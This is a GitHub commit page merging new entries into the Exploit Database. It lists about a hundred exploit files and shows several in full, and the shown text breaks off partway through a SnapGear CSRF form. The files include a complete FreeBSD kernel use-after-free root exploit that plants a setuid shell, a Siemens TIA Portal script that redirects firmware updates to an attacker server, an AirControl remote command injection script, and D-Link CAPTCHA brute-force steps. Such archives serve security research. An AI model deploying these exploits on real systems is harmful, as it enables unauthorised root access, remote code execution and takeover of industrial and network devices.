Browse Source

Merge branch 'master' into fix

pull/179/head
g0tmi1k 10 months ago
committed by GitHub
parent
commit
db8a253bfd
No known key found for this signature in database GPG Key ID: 4AEE18F83AFDEB23
115 changed files with 13551 additions and 75 deletions
  1. +12
    -0
      exploits/android/remote/47157.txt
  2. +678
    -0
      exploits/freebsd/local/47081.sh
  3. +51
    -0
      exploits/hardware/remote/47083.py
  4. +30
    -0
      exploits/hardware/webapps/48541.py
  5. +28
    -0
      exploits/hardware/webapps/48551.txt
  6. +72
    -0
      exploits/hardware/webapps/48554.txt
  7. +95
    -0
      exploits/hardware/webapps/48556.txt
  8. +68
    -0
      exploits/hardware/webapps/48561.txt
  9. +3670
    -0
      exploits/hardware/webapps/48588.py
  10. +18
    -0
      exploits/ios/local/47409.txt
  11. +138
    -0
      exploits/java/webapps/48549.py
  12. +71
    -0
      exploits/jsp/webapps/47391.go
  13. +30
    -0
      exploits/linux/dos/44994.html
  14. +131
    -0
      exploits/linux/remote/48196.txt
  15. +139
    -0
      exploits/linux/remote/48540.py
  16. +170
    -0
      exploits/linux/webapps/47330.rb
  17. +192
    -0
      exploits/multiple/remote/48569.py
  18. +37
    -0
      exploits/multiple/remote/48587.py
  19. +233
    -0
      exploits/multiple/webapps/47342.html
  20. +204
    -0
      exploits/multiple/webapps/47449.txt
  21. +31
    -0
      exploits/multiple/webapps/48528.txt
  22. +81
    -0
      exploits/multiple/webapps/48533.py
  23. +248
    -0
      exploits/multiple/webapps/48535.txt
  24. +139
    -0
      exploits/multiple/webapps/48553.txt
  25. +130
    -0
      exploits/multiple/webapps/48557.py
  26. +121
    -0
      exploits/multiple/webapps/48558.txt
  27. +134
    -0
      exploits/multiple/webapps/48580.py
  28. +93
    -0
      exploits/multiple/webapps/48581.txt
  29. +17
    -0
      exploits/multiple/webapps/48582.txt
  30. +100
    -0
      exploits/multiple/webapps/48595.txt
  31. +109
    -0
      exploits/php/webapps/47161.php
  32. +219
    -0
      exploits/php/webapps/47299.php
  33. +97
    -0
      exploits/php/webapps/47359.txt
  34. +167
    -0
      exploits/php/webapps/47413.py
  35. +238
    -0
      exploits/php/webapps/47443.rb
  36. +28
    -0
      exploits/php/webapps/48023.txt
  37. +39
    -0
      exploits/php/webapps/48058.txt
  38. +18
    -0
      exploits/php/webapps/48059.txt
  39. +14
    -0
      exploits/php/webapps/48061.txt
  40. +39
    -0
      exploits/php/webapps/48062.txt
  41. +19
    -0
      exploits/php/webapps/48065.txt
  42. +29
    -0
      exploits/php/webapps/48088.txt
  43. +31
    -0
      exploits/php/webapps/48093.txt
  44. +43
    -0
      exploits/php/webapps/48198.txt
  45. +189
    -0
      exploits/php/webapps/48199.txt
  46. +319
    -0
      exploits/php/webapps/48200.txt
  47. +23
    -0
      exploits/php/webapps/48213.txt
  48. +32
    -0
      exploits/php/webapps/48222.txt
  49. +191
    -0
      exploits/php/webapps/48230.txt
  50. +39
    -0
      exploits/php/webapps/48238.txt
  51. +60
    -0
      exploits/php/webapps/48278.txt
  52. +30
    -0
      exploits/php/webapps/48307.txt
  53. +121
    -0
      exploits/php/webapps/48347.txt
  54. +95
    -0
      exploits/php/webapps/48349.py
  55. +49
    -0
      exploits/php/webapps/48374.txt
  56. +22
    -0
      exploits/php/webapps/48529.txt
  57. +30
    -0
      exploits/php/webapps/48530.txt
  58. +103
    -0
      exploits/php/webapps/48531.py
  59. +23
    -0
      exploits/php/webapps/48532.txt
  60. +58
    -0
      exploits/php/webapps/48534.py
  61. +53
    -0
      exploits/php/webapps/48536.py
  62. +42
    -0
      exploits/php/webapps/48538.txt
  63. +15
    -0
      exploits/php/webapps/48539.txt
  64. +20
    -0
      exploits/php/webapps/48542.txt
  65. +62
    -0
      exploits/php/webapps/48544.txt
  66. +34
    -0
      exploits/php/webapps/48545.py
  67. +76
    -0
      exploits/php/webapps/48546.txt
  68. +62
    -0
      exploits/php/webapps/48547.txt
  69. +99
    -0
      exploits/php/webapps/48548.txt
  70. +29
    -0
      exploits/php/webapps/48550.txt
  71. +52
    -0
      exploits/php/webapps/48552.sh
  72. +40
    -0
      exploits/php/webapps/48559.txt
  73. +34
    -0
      exploits/php/webapps/48560.py
  74. +23
    -0
      exploits/php/webapps/48562.txt
  75. +64
    -0
      exploits/php/webapps/48567.txt
  76. +114
    -0
      exploits/php/webapps/48568.py
  77. +40
    -0
      exploits/php/webapps/48571.txt
  78. +39
    -0
      exploits/php/webapps/48572.txt
  79. +24
    -0
      exploits/php/webapps/48574.txt
  80. +47
    -0
      exploits/php/webapps/48590.py
  81. +35
    -0
      exploits/php/webapps/48593.txt
  82. +20
    -0
      exploits/php/webapps/48605.txt
  83. +27
    -0
      exploits/watchos/dos/47404.pl
  84. +30
    -0
      exploits/watchos/dos/47406.py
  85. +26
    -0
      exploits/windows/dos/38079.py
  86. +8
    -0
      exploits/windows/dos/43197.py
  87. +33
    -0
      exploits/windows/dos/43200.py
  88. +31
    -0
      exploits/windows/dos/44481.py
  89. +35
    -0
      exploits/windows/dos/47393.txt
  90. +26
    -0
      exploits/windows/dos/47795.py
  91. +21
    -0
      exploits/windows/dos/47801.py
  92. +33
    -0
      exploits/windows/dos/47849.py
  93. +33
    -0
      exploits/windows/dos/47872.py
  94. +135
    -0
      exploits/windows/dos/47963.cpp
  95. +87
    -0
      exploits/windows/local/47411.py
  96. +33
    -0
      exploits/windows/local/47476.py
  97. +620
    -0
      exploits/windows/local/47981.txt
  98. +53
    -0
      exploits/windows/local/48543.txt
  99. +70
    -0
      exploits/windows/local/48563.py
  100. +90
    -0
      exploits/windows/local/48564.py

+ 12
- 0
exploits/android/remote/47157.txt View File

@ -0,0 +1,12 @@
# Exploit Title: Android 7-9 - Remote Code Execution
# Date: [date]
# Exploit Author: Marcin Kozlowski
# Version: 7-9
# Tested on: Android
# CVE : 2019-2107
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns ....
With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2)
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47157.zip

+ 678
- 0
exploits/freebsd/local/47081.sh View File

@ -0,0 +1,678 @@
#!/bin/sh
# Exploit script for FreeBSD-SA-19:02.fd
#
# Author: Karsten König of Secfault Security
# Contact: karsten@secfault-security.com
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
#define ATTACK_PATH "/etc/libmap.conf"
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
#define CORE_0 0
#define CORE_1 1
#define MAX_TRIES 500
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
int send_recv(int fd, int sv[2], int n_fds) {
int ret, i;
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmh;
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
int *fds; char buf[1];
iov.iov_base = "a";
iov.iov_len = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
msg.msg_flags = 0;
cmh = CMSG_FIRSTHDR(&msg);
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
cmh->cmsg_level = SOL_SOCKET;
cmh->cmsg_type = SCM_RIGHTS;
fds = (int *)CMSG_DATA(cmsg);
for (i = 0; i < n_fds; i++) {
fds[i] = fd;
}
ret = sendmsg(sv[0], &msg, 0);
if (ret == -1) {
return 1;
}
iov.iov_base = buf;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmh;
msg.msg_controllen = CMSG_SPACE(0);
msg.msg_flags = 0;
ret = recvmsg(sv[1], &msg, 0);
if (ret == -1) {
return 1;
}
return 0;
}
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
perror("[!] open");
exit(1);
}
fchmod(fd, 0700);
return fd;
}
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is used but fd2 still points to the struct, hence fdrop()
// is called at exit and will panic because f_count will
// be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int sv[2], int fd)
{
send_recv(fd, sv, 0xfe);
}
int stick_thread_to_core(int core) {
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
/* if (core_id < 0 || core_id >= num_cores) */
/* return EINVAL; */
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
usleep(40);
// Close to fds to trigger uaf
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// refcount = 2 (primitive+fget_write)
close(fd);
close(fd2);
// refcount = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
void *hammer(void *arg) {
int i, j, k, client_socket, ret;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = (int *) malloc(sizeof(int));
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
if ((fd = open_tmp(NULL)) == -1)
perror("[!] write_to_file: open_tmp");
*fd_ptr = fd;
if (nbytes < 0) {
perror("[!] [!] write_to_file:write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
void prepare(int sv[2], int fds[2]) {
int fd, fd2, i;
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Get a single file descriptor to send via the socket
if ((fd = open_tmp(NULL)) == -1) {
perror("[!] open_tmp");
exit(1);
}
if ((fd2 = dup(fd)) == -1) {
perror("[!] dup");
exit(1);
}
// fp->f_count will increment by 0xfe in one iteration
// doing this 16909320 times will lead to
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
// Note the 2 because of the former call of dup() and
// the first open().
//
// To test our trigger we can send 0xd more fd's what
// would to an f_count of 0 when fdclose() is called in
// m_dispose_extcontrolm. fdrop() will reduce f_count to
// 0xffffffff = -1 and ultimately panic when _fdrop() is
// called because the latter asserts that f_count is 0.
// _fdrop is called in the first place because
// refcount_release() only checks that f_count is less or
// equal 1 to recognize the last reference.
//
// If we want to trigger the free without panic, we have
// to send 0xf fds and close an own what will lead to an
// fdrop() call without panic as f_count is 1 and reduced
// to 0 by close(). The unclosed descriptor references now
// a free 'struct file'.
for (i = 0; i < 16909320; i++) {
if (i % 1690930 == 0) {
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
}
if (send_recv(fd, sv, N_FDS)) {
perror("[!] prepare:send_recv");
exit(1);
}
}
if (send_recv(fd, sv, 0xf)) {
perror("[!] prepare:send_recv");
exit(1);
}
fds[0] = fd;
fds[1] = fd2;
printf("[+] Finished UaF preparation\n");
}
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
void fire() {
int i, j, fd, fd2, bytes_rec, server_socket;
int sv[2], fds[2], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
prepare(sv, fds);
fd = fds[0];
fd2 = fds[1];
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
close(fd);
close(fd2);
/* Prevent that a file stream in the hammer threads
* gets the file descriptor of fd for debugging purposes
*/
if ((fd = open_tmp("/tmp/dummy")) == -1)
perror("[!] dummy");
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
perror("[!] dummy2");
printf("[+] Fork %d fd: %d\n", j, fd);
printf("[+] Fork %d fd2: %d\n", j, fd2);
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
pthread_cond_broadcast(&hammer_cond);
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
printf("[+] Returned fd: %d\n", *fd_ptr);
prevent_panic(sv, *fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "[+] Firing the Heavy Cyber Weapon"
./heavy_cyber_weapon
su
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi

+ 51
- 0
exploits/hardware/remote/47083.py View File

@ -0,0 +1,51 @@
##
# Exploit Title: Siemens TIA Portal unauthenticated remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Vendor Homepage: www.siemens.com
# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html
# Version: TIA Portal V15 Update 4
# Tested on: Windows 10
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
##
##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##
import websocket, ssl, argparse
parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("(optional) update_server", help="Malicious firmware update server IP")
args = parser.parse_args()
host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
# Read current proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
# Change application proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
# Force a malicious firmware update
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)

+ 30
- 0
exploits/hardware/webapps/48541.py View File

@ -0,0 +1,30 @@
# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
# Date: 2020-06-03
# Exploit Author: 0xd0ff9 vs j3ssie
# Vendor Homepage: https://www.ui.com/
# Software Link: https://www.ui.com/download/#!utilities
# Version: AirControl <= 1.4.2
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml
import requests
import re
import urllib
import sys
print """USAGE: python exploit_aircontrol.py [url] [cmd]"""
url = sys.argv[1]
cmd = sys.argv[2]
burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)
Locat = r.headers["Location"]
res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)
print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)

+ 28
- 0
exploits/hardware/webapps/48551.txt View File

@ -0,0 +1,28 @@
# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
# Date: 2019-10-12
# Exploit Author: huzaifa hussain
# Vendor Homepage: https://in.dlink.com/
# Version: DIR-615 T1 ver:20.10
# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
# CVE: CVE-2019-17525
D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
------------------------------------
D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
ATTACK SCENARIO AND REPRODUCTION STEPS
1: Find the ROUTER LoginPage.
2: Fill the required login credentials.
3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
5: Set the payloads on target variables i.e. username & password under Payloads Tab.
5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
6: Now hit the start attack and you will find the correct credentials.
-------------------------------------
Huzaifa Hussain

+ 72
- 0
exploits/hardware/webapps/48554.txt View File

@ -0,0 +1,72 @@
# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A
Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User
Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1
Summary: The SG gateway appliance range provides Internet security and
privacy of communications for small and medium enterprises, and branch
offices. It simply and securely connects your office to the Internet,
and with its robust stateful firewall, shields your computers from
external threats.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: fnord/1.9
Apache 1.3.27 (Unix)
Linux 2.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5567
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php
14.05.2020
--
CSRF Add Super User:
--------------------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST">
<input type="hidden" name=".form" value="edit" />
<input type="hidden" name=".page" value="adminusers_edit" />
<input type="hidden" name="login" value="testingus" />
<input type="hidden" name="fullname" value="ZSL" />
